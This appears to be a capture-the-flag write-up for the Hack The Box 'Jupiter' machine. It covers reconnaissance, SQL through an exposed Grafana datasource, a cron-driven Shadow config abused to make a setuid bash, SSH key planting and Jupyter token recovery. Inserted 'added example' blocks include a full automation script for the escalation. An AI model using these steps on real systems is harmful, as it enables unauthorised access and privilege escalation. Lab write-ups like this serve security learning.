Nmap

┌──(root💀kali)-[/home/kali/hacktheboxtools]
└─# nmap -A 10.10.11.216
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-05 11:21 EDT
Stats: 0:00:57 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.94% done; ETC: 11:22 (0:00:00 remaining)
Stats: 0:00:58 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.29% done; ETC: 11:22 (0:00:00 remaining)
Stats: 0:00:59 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.29% done; ETC: 11:22 (0:00:00 remaining)
Stats: 0:00:59 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.29% done; ETC: 11:22 (0:00:00 remaining)
Stats: 0:00:59 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.29% done; ETC: 11:22 (0:00:00 remaining)
Nmap scan report for 10.10.11.216
Host is up (0.22s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 ac5bbe792dc97a00ed9ae62b2d0e9b32 (ECDSA)
|_  256 6001d7db927b13f0ba20c6c900a71b41 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://jupiter.htb/
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=6/5%OT=22%CT=1%CU=30597%PV=Y%DS=2%DC=T%G=Y%TM=647DFDB9
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=109%TI=Z%CI=Z%TS=B)SEQ(SP=10
OS:1%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M537ST11NW7%O2=M537ST11NW7%O3
OS:=M537NNT11NW7%O4=M537ST11NW7%O5=M537ST11NW7%O6=M537ST11)WIN(W1=FE88%W2=F
OS:E88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M537NNSNW
OS:7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF
OS:=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=
OS:%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=
OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RI
OS:PCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 111/tcp)
HOP RTT       ADDRESS
1   270.35 ms 10.10.16.1
2   176.97 ms 10.10.11.216

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.74 seconds

The usual pair of ports, 22 (SSH) and 80 (HTTP). The http-title check shows nginx redirecting to http://jupiter.htb/, so that name needs a hosts entry before the site can be browsed.


Add to /etc/hosts:
10.10.11.216 jupiter.htb

Main domain


At first sight the root domain has no useful functionality, so try vhost brute-forcing.

┌──(root💀kali)-[/home/kali/hacktheboxtools]
└─# gobuster vhost -u http://jupiter.htb --append-domain -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 100
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://jupiter.htb
[+] Method:          GET
[+] Threads:         100
[+] Wordlist:        /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent:      gobuster/3.3
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
2023/06/05 11:25:42 Starting gobuster in VHOST enumeration mode
===============================================================
Found: kiosk.jupiter.htb Status: 200 [Size: 34390]
Progress: 114441 / 114442 (100.00%)===============================================================
2023/06/05 11:41:33 Finished
===============================================================

kiosk.jupiter.htb

There is a kiosk.jupiter.htb vhost; add it to the hosts file as well.


It is a Grafana instance.


In Burp's HTTP history there is a request like this one:


The SQL statement in this request is under our control. Grafana's datasource query endpoint forwards the raw SQL to the configured datasource using the credentials Grafana stores for it, so anyone who can reach the dashboard gets to run SQL with that datasource role's privileges.

The database type shows as PostgreSQL, so check hacktricks for the matching injection techniques.

Refer:https://book.hacktricks.xyz/network-services-pentesting/pentesting-postgresql

PostgreSQL

List databases

SELECT datname FROM pg_database;

postgres
moon_namesdb
template1
template0

Read credentials

SELECT usename, passwd from pg_shadow;

usename         passwd
postgres        NULL
grafana_viewer  SCRAM-SHA-256$4096:K9IJE4h9f9+tr7u7AZL76w==$qdrtC1sThWDZGwnPwNctrEbEwc8rFpLWYFVTeLOy3ss=:oD4gG69X8qrSG4bXtQ62M83OkjeFDOYrypE3tUv0JOY=

Two things follow from this. pg_shadow is not readable by ordinary roles, so the role Grafana connects with is privileged (in practice a superuser), which is what makes the next step possible. The grafana_viewer entry is a SCRAM-SHA-256 verifier (iteration count, salt, StoredKey, ServerKey); unlike an md5 hash it cannot be replayed to authenticate and would have to be cracked offline. postgres itself has no password set (NULL), so password authentication as that role is not possible at all.

RCE

The injection point runs with superuser rights on the PostgreSQL side, so the standard route described on the hacktricks page linked above applies: the COPY ... FROM PROGRAM statement executes a shell command on the database host as the postgres OS user, and writing its output into a table lets us read the result back with a SELECT.

Try a reverse shell from there.

shell!!!! ^-^

Information gathering

linpeas

Run linpeas to collect information.


User-related information

pspy


A pile of other people's reverse shells, lol, too many people are attacking the box at the same time.

Processes run by juno


After waiting a while, pspy shows uid=1000 (juno) running a script, shadow-simulation.sh (presumably a network-simulation job), apparently on a schedule.

Right after that it deletes /dev/shm/shadow.data,
then runs the shadow command with /dev/shm/network-simulation.yml as its argument.
So let's look at that config file.


network-simulation.yml

general:
  # stop after 10 simulated seconds
  stop_time: 10s
  # old versions of cURL use a busy loop, so to avoid spinning in this busy
  # loop indefinitely, we add a system call latency to advance the simulated
  # time when running non-blocking system calls
  model_unblocked_syscall_latency: true

network:
  graph:
    # use a built-in network graph containing
    # a single vertex with a bandwidth of 1 Gbit
    type: 1_gbit_switch

hosts:
  # a host with the hostname 'server'
  server:
    network_node_id: 0
    processes:
    - path: /usr/bin/python3
      args: -m http.server 80
      start_time: 3s
  # three hosts with hostnames 'client1', 'client2', and 'client3'
  client:
    network_node_id: 0
    quantity: 3
    processes:
    - path: /usr/bin/curl
      args: -s server
      start_time: 5s

The config reads like this: the server starts a web service on port 80 and the clients then request it.
path looks like the absolute path of the binary to execute,
and args are its arguments. Shadow is a network simulator that runs real programs, so whatever is listed under path is executed on the real host as the user running shadow, here juno.

Try the chmod +s trick to get a SUID bash. juno cannot chmod the root-owned /bin/bash, so the payload first copies bash into our staging directory (the copy is then owned by juno) and sets u+s on the copy; a setuid binary owned by juno gives juno's uid, not root.

general:
  # stop after 10 simulated seconds
  stop_time: 10s
  # old versions of cURL use a busy loop, so to avoid spinning in this busy
  # loop indefinitely, we add a system call latency to advance the simulated
  # time when running non-blocking system calls
  model_unblocked_syscall_latency: true

network:
  graph:
    # use a built-in network graph containing
    # a single vertex with a bandwidth of 1 Gbit
    type: 1_gbit_switch

hosts:
  # a host with the hostname 'server'
  server:
    network_node_id: 0
    processes:
    - path: /usr/bin/cp
      args: /bin/bash /tmp/someb0dy/bash
      start_time: 3s
  # three hosts with hostnames 'client1', 'client2', and 'client3'
  client:
    network_node_id: 0
    quantity: 3
    processes:
    - path: /usr/bin/chmod
      args: u+s /tmp/someb0dy/bash
      start_time: 5s

Then place it in /dev/shm/ on the target. Worth noting: /dev/shm is a tmpfs, so its contents live in memory and disappear on reboot.

I first upload the file to /tmp/someb0dy,
then overwrite the original with cp /tmp/someb0dy/network-simulation.yml /dev/shm/.
Remember to chmod 777 /tmp/someb0dy, otherwise juno has no permission to write the bash copy into that directory.


Then, from /tmp/someb0dy, run ./bash -p and we have a shell as juno (-p stops bash from dropping the effective uid).

Reading the script in /home/juno confirms the mechanism:

bash-5.1$ cat shadow-simulation.sh
#!/bin/bash
cd /dev/shm
rm -rf /dev/shm/shadow.data
/home/juno/.local/bin/shadow /dev/shm/*.yml
cp -a /home/juno/shadow/examples/http-server/network-simulation.yml /dev/shm/
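Putting the steps above together, as an added example that is my own script and not from the original write-up: it builds the payload YAML, drops it where the cron job's /dev/shm/*.yml glob will pick it up, and polls until the setuid copy of bash appears. The staging path /tmp/someb0dy, the 180 s wait and the RUN_CHAIN guard are assumptions of this example. Two details of the script shown above matter here: the glob means any .yml in /dev/shm is passed to shadow (so overwrite the existing file rather than adding a second one), and the trailing cp -a restores the stock example after every run, so the payload only survives until the next tick and has to be in place before it.

```shell
#!/bin/bash
# Added example, not from the original write-up: automate the juno escalation.
# Assumptions (not in the original): the cron job is exactly the
# shadow-simulation.sh shown above (globs /dev/shm/*.yml as juno, then restores
# the stock example with cp -a); STAGE, the 180 s wait and RUN_CHAIN are ours.
set -u

STAGE="${STAGE:-/tmp/someb0dy}"   # world-writable dir juno will cp into
SHM="${SHM:-/dev/shm}"            # directory the cron job globs for *.yml

# Write a shadow config whose process entries run our binaries as juno.
# $1 = output file, $2 = staging directory used inside the payload.
# Layout mirrors the stock example so shadow accepts it; only path/args differ.
make_payload_yaml() {
  local out="$1" stage="$2"
  cat > "$out" <<EOF
general:
  stop_time: 10s
  model_unblocked_syscall_latency: true

network:
  graph:
    type: 1_gbit_switch

hosts:
  server:
    network_node_id: 0
    processes:
    - path: /usr/bin/cp
      args: /bin/bash ${stage}/bash
      start_time: 3s
  client:
    network_node_id: 0
    quantity: 1
    processes:
    - path: /usr/bin/chmod
      args: u+s ${stage}/bash
      start_time: 5s
EOF
}

# Poll until $1 exists with its setuid bit set, or give up after $2 seconds.
# Returns 0 on success, 1 on timeout.
wait_for_suid() {
  local target="$1" timeout="$2" waited=0
  while [ "$waited" -lt "$timeout" ]; do
    if [ -u "$target" ]; then
      return 0
    fi
    sleep 1
    waited=$((waited + 1))
  done
  return 1
}

# The whole chain; only meaningful on the target, from the postgres shell.
run_chain() {
  mkdir -p "$STAGE" && chmod 777 "$STAGE"   # juno (uid 1000) must be able to write here
  make_payload_yaml "$STAGE/network-simulation.yml" "$STAGE"
  # Overwrite the existing file rather than adding a second .yml: the glob
  # would otherwise hand shadow two config paths. The job's trailing cp -a
  # puts the stock example back after each run, so the payload must land
  # before the next tick and is consumed by it.
  cp "$STAGE/network-simulation.yml" "$SHM/network-simulation.yml"
  if wait_for_suid "$STAGE/bash" 180; then
    exec "$STAGE/bash" -p    # -p keeps the setuid euid (juno) instead of dropping it
  fi
  echo "timed out waiting for a setuid bash in $STAGE" >&2
  return 1
}

# Guarded so that running or sourcing the file locally only defines functions.
if [ "${RUN_CHAIN:-0}" = "1" ]; then
  run_chain
fi
```

On the target run it as RUN_CHAIN=1 from the postgres shell; without that variable the file only defines the functions, so the YAML generation and the setuid check can be exercised locally first.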

Writing an SSH public key

We can also write a public key straight into .ssh/authorized_keys and then log in over SSH.

ssh-keygen -f someb0dy    # generate the key pair
cp  /tmp/someb0dy/someb0dy.pub /home/juno/.ssh/authorized_keys

cp replaces whatever was already in authorized_keys; appending with >> is the less destructive option. sshd also ignores the file unless ~/.ssh is mode 700 and authorized_keys is not group- or world-writable.

Login with the private key succeeds. juno is in the science group, so search for files that group can access.


Proxying traffic with frp

There are quite a few listening ports, so set up a proxy to look at them.


Why search for token information? Because port 8888 serves a Jupyter notebook server, which gates access with a token.


None of the tokens found so far worked.
Then I read the log file directly: today is 6.6, and the token in there works.


The token from the log works. By default Jupyter generates a fresh random token every time the server starts, so only the entry from the most recent startup in the log is valid and anything older is dead.
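Pulling the right token out of such a log, as an added example (my own code, not from the original write-up): the log lines below are constructed in the stock format a Jupyter ServerApp prints at startup, and the real log path on the target is not known from the write-up, so locating it is left to a find over the science group's files.

```shell
#!/bin/sh
# Added example, not from the write-up: extract the newest Jupyter access token
# from a server log. The sample lines are constructed here, not copied from the
# target; the format is the stock "ServerApp" startup banner.

SAMPLE_LOG=$(mktemp)
cat > "$SAMPLE_LOG" <<'EOF'
[I 2023-06-05 09:12:31.004 ServerApp] Jupyter Server 2.3.0 is running at:
[I 2023-06-05 09:12:31.004 ServerApp] http://localhost:8888/lab?token=0f1e2d3c4b5a69788796a5b4c3d2e1f0a1b2c3d4e5f60718
[I 2023-06-05 09:12:31.005 ServerApp]     http://127.0.0.1:8888/lab?token=0f1e2d3c4b5a69788796a5b4c3d2e1f0a1b2c3d4e5f60718
[W 2023-06-05 23:59:01.120 ServerApp] 403 GET /api/contents (127.0.0.1): token mismatch
[I 2023-06-06 08:02:10.330 ServerApp] Jupyter Server 2.3.0 is running at:
[I 2023-06-06 08:02:10.330 ServerApp] http://localhost:8888/lab?token=deadbeef00112233445566778899aabbccddeeff00112233
EOF

# Print every token= value in the log, one per line, in file order.
list_tokens() {
  sed -n 's/.*[?&]token=\([A-Za-z0-9_-]*\).*/\1/p' "$1"
}

# Print the most recently logged token. Jupyter mints a new token on every
# start, so earlier entries belong to servers that no longer exist.
latest_token() {
  list_tokens "$1" | tail -n 1
}

# Number of distinct tokens seen; more than one means the service restarted
# and only the last token is worth trying.
distinct_token_count() {
  list_tokens "$1" | sort -u | wc -l | tr -d ' '
}

# On the target (log path is an assumption; find it first):
#   find / -group science -name '*.log' 2>/dev/null
#   latest_token /path/to/jupyter.log
#   curl -s -o /dev/null -w '%{http_code}\n' \
#     "http://127.0.0.1:8888/?token=$(latest_token /path/to/jupyter.log)"
```

A 302 or 200 from the curl check (rather than a redirect back to the login page) confirms the token is the live one before wiring it through the proxy into a browser.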


Same technique as for the previous user: write a public key into .ssh/authorized_keys.


Privilege escalation

jovian@jupiter:/usr/local/bin$ sudo -l
Matching Defaults entries for jovian on jupiter:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User jovian may run the following commands on jupiter:
    (ALL) NOPASSWD: /usr/local/bin/sattrack

This **/usr/local/bin/sattrack** can be executed as root without a password.


Running it directly prints some hint messages.
Replace bash with this binary. Before going further it is worth checking what the binary trusts: ls -l on it and on /usr/local/bin, and whether it reads a config file or data path that a lower-privileged user can write to, since a NOPASSWD sudo rule is only as strong as those.


Summary

Overall this box is of medium difficulty: standard information gathering, discovery of the subdomain, further enumeration, a shell as the postgres user through PostgreSQL, escalation to juno by watching process activity, then jovian through juno's group membership, and finally root.